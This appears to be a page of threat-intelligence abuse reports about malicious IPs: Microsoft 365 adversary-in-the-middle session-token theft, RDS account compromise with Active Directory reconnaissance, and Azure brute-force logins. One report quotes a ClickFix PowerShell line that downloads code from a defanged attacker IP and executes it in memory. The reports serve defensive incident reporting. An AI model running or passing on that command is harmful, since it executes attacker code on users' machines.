Huntress identified a critical security incident on CG-RDS16 and isolated the host due to evidence o ...
show moreHuntress identified a critical security incident on CG-RDS16 and isolated the host due to evidence of unauthorized access and active reconnaissance. On 2026-08-03, user CG\kris authenticated to the externally exposed RD Web portal from IP 31.76.250.5 using a workstation previously associated with malicious activity (DESKTOP-KEMBR5R). Shortly afterward, the account enumerated Active Directory by identifying domain controllers and querying the Domain Computers group, indicating possible attacker reconnaissance and preparation for lateral movement. Huntress recommends immediately disabling the affected account, removing external RD Web exposure, reviewing logs for additional access, investigating other systems for compromise, resetting potentially impacted credentials, validating security tooling, and rebuilding affected hosts from a known-good baseline if compromise is confirmed.
show less
The PowerShell commands used Invoke-RestMethod (irm) to download and execute remote content from the ...
show moreThe PowerShell commands used Invoke-RestMethod (irm) to download and execute remote content from the IP address 31[.]76[.]87[.]37. The commands ran with the syntax powershell.exe -c iex(irm '31[.]76[.]87[.]37/xlOeggkVIC1NFgRgG' -UseBasicParsing), which downloads and immediately executes code in memory. This technique is characteristic of ClickFix malware, which uses in-memory execution to evade detection and avoid leaving traditional file-based artifacts on disk.
show less
Observed IP 172.127.95.85 participating in a suspected Microsoft 365 Adversary-in-the-Middle (AiTM) ...
show moreObserved IP 172.127.95.85 participating in a suspected Microsoft 365 Adversary-in-the-Middle (AiTM) phishing operation. On 2026-07-23 00:18:07 UTC, a user authentication completed through this IP, which is identified as a callback proxy. Evidence indicates post-MFA session cookie interception and replay. Within the same session (ID: 006e330a-5b09-d4f3-add0-869e83faaf96), attributes rapidly changed from OzarksGo, LLC to AT&T Enterprises, LLC, Safari to Firefox, and US-AR to US-CA, consistent with stolen session token reuse from attacker infrastructure. Access targeted Microsoft Outlook (App ID 5d661950-3475-41cd-a2c3-d671a3162bc1) from a non-compliant unmanaged device. Activity appears associated with credential phishing, session hijacking, and unauthorized account access.
show less
Microsoft 365 account compromise / suspected AiTM session-token theft. At 2026-07-16 15:54:43 UTC, I ...
show moreMicrosoft 365 account compromise / suspected AiTM session-token theft. At 2026-07-16 15:54:43 UTC, IP 192.3.232.141 authenticated from HostPapa datacenter infrastructure using Edge on Windows 10 from an unmanaged, non-compliant device. Huntress detected the session as suspicious; a WS-Federation token was issued, consistent with tokens captured by AiTM relay kits. The same session ID later showed activity from 2604:980:1002:11::e101 via Zenlayer/Mullvad VPN using Chrome on macOS, indicating token replay from a different device/network. Activity is not legitimate and is associated with credential phishing/session hijacking against Microsoft 365.
show less
Generating response Copilot said: At 2026-07-14 00:51:09 UTC, Huntress detected suspicious Microsoft ...
show moreGenerating response Copilot said: At 2026-07-14 00:51:09 UTC, Huntress detected suspicious Microsoft 365 session activity for [email protected] consistent with an Adversary-in-the-Middle (AiTM) token theft attack. The session originated from Comcast Cable Communications (US-MD) and was subsequently replayed from Wowrack.com datacenter infrastructure (209.90.236.20, US-WA). Multiple session characteristics changed simultaneously, including ASN, browser, region, and infrastructure type, while the operating system remained Windows, indicating a likely stolen session token being reused from attacker-controlled infrastructure. Because the token was already authenticated, MFA was bypassed during replay. Please verify whether this activity was legitimate. If unauthorized, immediately reset the user's password, revoke all active sessions, and re-register MFA methods. Failure to remediate may allow continued access to Microsoft 365 resources and sensitive organizational data.
show less
Observed 71.167.153.224 (Verizon Business AS701, Long Beach, NY) involved in a suspected Microsoft 3 ...
show moreObserved 71.167.153.224 (Verizon Business AS701, Long Beach, NY) involved in a suspected Microsoft 365 Adversary-in-the-Middle (AiTM) phishing/session hijacking event on 2026-07-13 13:26:44 UTC. The IP is tagged as CALLBACK_PROXY and associated with proxy providers NODEMAVEN_PROXY, INFATICA_PROXY, and MASSIVE_PROXY. A successful post-MFA authentication (Microsoft Authentication Broker, Cmsi:Cmsi) occurred from an unmanaged, non-compliant device immediately after MFA completion, consistent with session token/cookie theft and replay. The same M365 session ID (0032899a-53c1-02fe-081e-a3f0135d3a71) shifted from a legitimate Comcast connection in Florida to this Verizon IP in New York, indicating a mid-session ASN/geolocation pivot. Activity is consistent with proxy-assisted phishing infrastructure used to bypass MFA and gain unauthorized access to a Microsoft 365 account using stolen session tokens.
show less
Number of Failed Login Events: 322
Number of Target Users: 1
Message Type: Azure User Login Failed ...
show moreNumber of Failed Login Events: 322
Number of Target Users: 1
Message Type: Azure User Login Failed
Source IP Address: 160.250.133.164 (Vietnam)
show less
Brute-Force
By clicking “Accept all”, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.